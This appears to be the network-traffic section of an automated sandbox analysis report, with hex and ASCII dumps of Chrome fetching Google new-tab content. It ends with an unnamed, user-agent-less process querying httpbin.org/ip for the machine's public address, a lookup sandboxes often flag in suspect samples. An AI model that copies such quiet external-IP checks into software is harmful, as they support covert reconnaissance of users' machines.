                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:57 GMT
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-yg21Izsi9JQ5Jsk1D12kfw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC124INData Raw: 33 34 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 74 61 20 36 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 6d 61 72 76 65 6c 20 6d 6f 76 69 65 73 20 32 30 32 35 22 2c 22 79 65 6c 6c 6f 77 73 74 6f 6e 65 20 73 75 70 65 72 76 6f 6c 63 61 6e 6f 20 65 72 75 70 74 69 6f 6e 22 2c 22 6c 61 73 20 63 75 61 74 72 6f 20 6d 69 6c 70 61 73 20 72 65 73 74 61 75 72 61 6e 74 20 63
                                                                                                                                                                                                                                                  Data Ascii: 346)]}'["",["gta 6 release date","marvel movies 2025","yellowstone supervolcano eruption","las cuatro milpas restaurant c
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC721INData Raw: 6c 6f 73 75 72 65 22 2c 22 6c 6f 76 65 20 6d 65 20 6d 6f 76 69 65 20 74 72 61 69 6c 65 72 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 70 6c 61 79 6f 66 66 20 6e 6f 74 72 65 20 64 61 6d 65 22 2c 22 61 70 70 6c 65 20 73 69 72 69 20 63 6c 61 73 73 20 61 63 74 69 6f 6e 20 6c 61 77 73 75 69 74 22 2c 22 70 73 20 70 6c 75 73 20 6d 6f 6e 74 68 6c 79 20 67 61 6d 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63
                                                                                                                                                                                                                                                  Data Ascii: losure","love me movie trailer","college football playoff notre dame","apple siri class action lawsuit","ps plus monthly games"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2Vhc
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  28192.168.2.450074142.250.185.164443796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:57 GMT
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC372INData Raw: 31 39 31 63 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                  Data Ascii: 191c)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                  Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                  Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                  Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                  Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC504INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 35 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                  Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700335,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC273INData Raw: 31 30 61 0d 0a 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32
                                                                                                                                                                                                                                                  Data Ascii: 10a!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u002
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1390INData Raw: 38 30 30 30 0d 0a 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 30 32 36 5c 75 30 30 32 36 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 2e 77 72 61 70 28 61 29 3a 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 3b 5c 6e 7d
                                                                                                                                                                                                                                                  Data Ascii: 8000click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof AsyncContext!\u003d\u003d\"undefined\"\u0026\u0026typeof AsyncContext.Snapshot\u003d\u003d\u003d\"function\"?a\u003d\u003ea\u0026\u0026AsyncContext.Snapshot.wrap(a):a\u003d\u003ea;\n}
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1390INData Raw: 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 61 5c 75 30 30 33 64 2b 61 7d 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 29 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 61 5c 75 30 30 33 64 6e 75 6c 6c 3b 69 66 28 21 50 64 29 72 65 74 75
                                                                                                                                                                                                                                                  Data Ascii: a)?a|0:void 0};_.Od\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"string\"){if(!a)return;a\u003d+a}if(typeof a\u003d\u003d\u003d\"number\")return Number.isFinite(a)?a|0:void 0};Qd\u003dfunction(){let a\u003dnull;if(!Pd)retu
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC1390INData Raw: 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 62 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 50 64 5c 75 30 30 33 64 5f 2e 48 64 3b 5f 2e 54 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 57 64 5c 75 30 30 33
                                                                                                                                                                                                                                                  Data Ascii: c\u003d0){return _.tb(_.be(a,b),c)};_.ce\u003dfunction(a,b,c\u003d0){return _.tb(_.S(a,b),c)};_.ee\u003dfunction(a,b){return a.lastIndexOf(b,0)\u003d\u003d0};Pd\u003d_.Hd;_.Td\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};Wd\u003


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  29192.168.2.450073142.250.185.164443796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:57 GMT
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                  2025-01-03 08:50:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  30192.168.2.45008934.200.57.114443
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:51:06 UTC52OUTGET /ip HTTP/1.1
                                                                                                                                                                                                                                                  Host: httpbin.org
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  2025-01-03 08:51:06 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:06 GMT
                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Server: gunicorn/19.9.0
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                  2025-01-03 08:51:06 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
